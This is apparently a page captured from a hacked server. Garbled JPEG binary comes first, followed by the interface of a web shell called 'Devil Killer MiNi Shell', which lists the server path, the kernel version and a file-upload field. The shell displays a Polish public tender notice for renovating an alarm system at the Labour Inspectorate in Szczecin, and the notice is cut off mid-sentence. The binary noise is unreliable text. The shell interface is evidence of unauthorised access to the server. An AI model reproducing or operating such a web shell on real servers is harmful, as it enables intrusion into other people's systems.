JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240524/0033868101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont instalacji systemu sygnalizacji włamania i napadu (SSWiN) w budynku siedziby OIP w Szczecinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowa Inspekcja Pracy, Okręgowy Inspektorat Pracy w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000870468</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pszczelna 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-663</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">organizacja@szczecin.pip.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://szczecin.pip.gov.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Nadzór i kontrola przestrzegania prawa pracy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont instalacji systemu sygnalizacji włamania i napadu (SSWiN) w budynku siedziby OIP w Szczecinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e17751c-1999-11ef-bfd3-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00338681</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00241087/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont instalacji alarmowej w siedzibie Okręgowego Inspektoratu Pracy w Szczcinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3e17751c-1999-11ef-bfd3-e6cc5d6d04e5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Poprzez system teleinformatyczny dostępny na Platformie e-zamówienia (strona<br/>postępowania: https://ezamowienia.gov.pl)<br/>b) w przypadku braku możliwości komunikacji wykonawcy i zamawiającego za pośrednictwem Platformy e-Zamówienia<br/>spowodowanego jej awarią lub brakiem dostępności Platformy, zamawiający dopuszcza przekazywanie dokumentów (nie dotyczy<br/>złożenia oferty) poprzez skrzynkę poczty elektronicznej: organizacja@szczecin.pip.gov.pl<br/>c) Zamawiający wskazuje pocztę elektroniczną wyłącznie jako alternatywny środek komunikacji elektronicznej w przypadku awarii<br/>lub braku dostępności Platformy e-zamówienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)	Zamawiający zapewnia bezpłatny, pełny, bezpośredni i nieograniczany dostęp do SWZ od dnia zamieszczenia ogłoszenia o zamówieniu, nie krócej niż do dnia udzielenia zamówienia na Platformie e-zamówienia.<br/>b)	W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>i.	Komputer klasy PC – parametry minimum: Intel Core2 Duo, 2 GB RAM, HDD; zainstalowany jeden z systemów operacyjnych: MS Windows 7 lub nowszy, OSX/Mac OS 10.10, Ubuntu 14.04; Zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza, Firefox 59.0 lub nowszy, Safari 11.1 lub nowsza, Edge 14.0 i nowsza; albo<br/>ii.	Tablet lub Telefon – parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3; Przeglądarka Chrome 61 lub nowsza.<br/>iii.	Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies;<br/>iv.	Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych:<br/>•	specyfikacja połączenia – formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>•	format danych oraz kodowanie: formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>•	oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do sekundy.<br/>c)	Szczegółowe zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin dostępny na stronie internetowej pod linkiem:<br/>https://ezamowienia.gov.pl/pl/regulamin/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">23.	Klauzula informacyjna Zamawiającego (dot. danych osobowych osób fizycznych)<br/>1)	Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO), Okręgowy Inspektor Pracy w Szczecinie, informuje że:<br/>a)	Administratorem danych osobowych jest Okręgowy Inspektor Pracy w Szczecinie, z siedzibą przy ul. Pszczelnej 7, 71-663 Szczecin.<br/>b)	Administrator powołał inspektora ochrony danych nadzorującego prawidłowość przetwarzania danych osobowych, z którym można skontaktować się za pośrednictwem adresu e-mail: iod@szczecin.pip.gov.pl<br/>c)	Dane osobowe przetwarzane będą w celu realizacji z obowiązku prawnego, ciążącego na administratorze oraz w celu wykonania umowy, której stroną jest osoba, której dane dotyczą, zgodnie z art. 6 ust. 1 lit. b) oraz c) RODO.<br/>d)	Odbiorcą danych osobowych mogą zostać<br/>i.	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu przepisy ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz.U. 2023, poz. 1270 ze zm.),<br/>ii.	inne jednostki organizacyjne PIP,<br/>iii.	uprawnione organy publiczne,<br/>iv.	podmioty wykonujące usługi niszczenia i archiwizacji dokumentacji,<br/>v.	podmioty, które mogą uzyskać dane na podstawie przepisów prawa.<br/>e)	Dane osobowe mogą być przekazywane do państwa trzeciego lub organizacji międzynarodowej na podstawie prawnie wiążącego i egzekwowalnego instrumentu między organami lub podmiotami publicznymi.<br/>f)	Dane przechowywane będą przez czas określony w przepisach prawa.<br/>g)	Istnieje prawo dostępu do treści swoich danych osobowych oraz prawo żądania ich sprostowania, usunięcia, ograniczenia przetwarzania oraz prawo do złożenia sprzeciwu wobec przetwarzania danych osobowych, oraz przenoszenia danych.<br/>h)	Istnieje prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>i)	Podanie danych jest wymogiem umownym lub warunkiem zawarcia umowy, jest dobrowolne, ale konieczne do realizacji celów do jakich zostały zebrane. Niepodanie danych osobowych może uniemożliwić prawidłowe wykonanie umowy lub jej zawarcie.<br/>j)	Dane nie będą przetwarzane w sposób zautomatyzowany i nie będą poddawane profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZ-PORA.A.213.62.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 158290,13 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 47502,06 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont instalacji systemu sygnalizacji włamania i napadu (SSWiN) w budynku siedziby OIP w Szczecinie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Wykonanie przeglądu konserwacyjnego po upływie udzielonej gwarancji i rękojmi stanowi prawo opcji Zamawiającego.<br/>2)	Przegląd konserwacyjny realizowany w zakresie prawa opcji może zostać wykonany wyłącznie na podstawie zlecenia Zamawiającego. <br/>3)	Z tytułu ewentualnej decyzji Zamawiającego o braku wykonania pozycji objętej prawem opcji Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego.<br/>4)	Zamawiający zleci wykonanie prawa opcji jeżeli zajdzie potrzeba wykonania usługi oraz jeśli stawka zaoferowania przez Wykonawcę będzie korzystna ekonomicznie na moment zlecenia usługi.<br/>5)	Maksymalnie w ramach umowy Zamawiający uprawniony jest do zlecenia przeglądów w liczbie, która będzie odpowiadała wskazanej przez Wykonawcę liczbie przeglądów w jednym roku eksploatacji oraz okresowi gwarantowanej ceny przeglądów zaoferowanemu przez Wykonawcę.<br/>6)	Minimalny poziom skorzystania z uprawnienia to zlecenie w zaoferowanym okresie przynajmniej jednego przeglądu konserwacyjnego. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy, polegających na powtórzeniu podobnych robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego, o wartości do kwoty 15 000,00 zł netto;<br/>Zamówienia podobne będą polegały na powtórzeniu robót budowalnych zgodnych z robotami budowlanymi stanowiącymi przedmiot zamówienia oraz robót budowlanych podobnych do nich w aspekcie technologicznym ich wykonawstwa.<br/>Zakresem zamówienia podobnego mogą być objęte prace obejmujące branże budowlane wskazane rodzajowo w załączniku nr 1 do części III SWZ dla zamówienia podstawowego.<br/>Zamówienia, podobne będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.<br/>Zamówienia podobne mogą zostać w szczególności udzielane w przypadku konieczności rozszerzenia zakresu przedmiotu innego zamówienia o roboty budowlane</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty, która uzyska najkorzystniejszy bilans punków w oparciu o kryteria oceny określone w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">c) Oferowany okres gwarantowanej ceny przeglądów konserwacyjnych po udzielonej przez wykonawcę gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">d) Oferowany okres rękojmi i gwarancji na wykonane roboty (dotyczy całej instalacji SSWiN oraz robót instalacyjnych)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">e) Oferowany okres rękojmi na zainstalowany osprzęt teletechniczny (dotyczy: centrali alarmowej, manipulatorów LCD ekspanderów rozszerzeń, kontaktronów oraz ethernetowych modułów komunikacyjnych)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">f) Wysokość kary umownej za zwłokę w wykonaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">Kryterium 7</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">g) Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">8</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w zakresie dotyczącym:<br/>a)	zdolności do występowania w obrocie gospodarczym –<br/>nie zostają ustanowione<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej –<br/>nie zostają ustanowione;<br/>c)	sytuacji ekonomicznej lub finansowej –<br/>nie zostają ustanowione<br/>d)	zdolności technicznej lub zawodowej –<br/>Zamawiający ustanawia warunki udziału o treści:<br/>I.	W zakresie doświadczenia – wykonawca zobowiązany jest udowodnić, że wykonał należycie, nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert<br/>i.	co najmniej dwie roboty budowlane, w których zakresie znajdowało się wykonanie nowej lub remont instalacji SSWiN o wartości prac w zakresie dotyczącym instalacji SSWiN przynajmniej 40 000,00 zł brutto – dla każdego z przedstawionych zadań<br/>II.	W zakresie dysponowania osobami (kierownik robót) – wykonawca zobowiązany jest udowodnić, że będzie dysponował:<br/>i.	co najmniej jedną osobą, która posiada prawo do pełnienia samodzielnych funkcji technicznych w budownictwie – przynajmniej w zakresie kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych o napięciu do 1 kV (lub równoważne) i jednocześnie posiada:<br/>a)	doświadczenie w kierowaniu robotami budowlanymi w branży elektrycznej lub teletechnicznej przez okres przynajmniej jednego roku. (od dnia ukończenia pierwszego przypadku pełnienia funkcji do ukończenia przypadku ostatniego – przynajmniej 1 roku) oraz<br/>b)	doświadczenie w postaci kierowania robotami budowlanymi w zakresie branży elektrycznej podczas realizacji co najmniej jednego zadania budowlanego obejmującego wykonanie nowej lub remont istniejącej instalacji alarmowej SSWiN.<br/>III.	Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz.U. z 2023 r., poz. 682 z późn. zm.) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. W związku z powyższym Zamawiający zaakceptuje równoważne uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2023 r., poz. 334).<br/>IV.	W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art 4 a ustawy z dnia 15 grudnia 2000 r o samorządach zawodowych architektów oraz inżynierów budownictwa, osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do kierowania robotami budowlanymi, wyszczególnione wyżej jeżeli: <br/>•	nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do kierowania robotami budowlanymi, oraz<br/>•	posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do tych osób wymagania, o których mowa w art 20 a ust 2 6 ustawy z dnia 15 grudnia 2000 r o samorządach zawodowych architektów, inżynierów budownictwa, dotyczące świadczenia usług transgranicznych.<br/>V.	W przypadku wspólnego ubiegania się o udzielnie zamówienia wyżej wymienione warunki mogą zostać spełnione przez partnerów łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenie o<br/>aktualności informacji zawartych w oświadczeniu wstępnym<br/>b) Oświadczenie dotyczące przynależności do grupy kapitałowej</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>Wykaz robót budowlanych wraz dowodami ich należytego 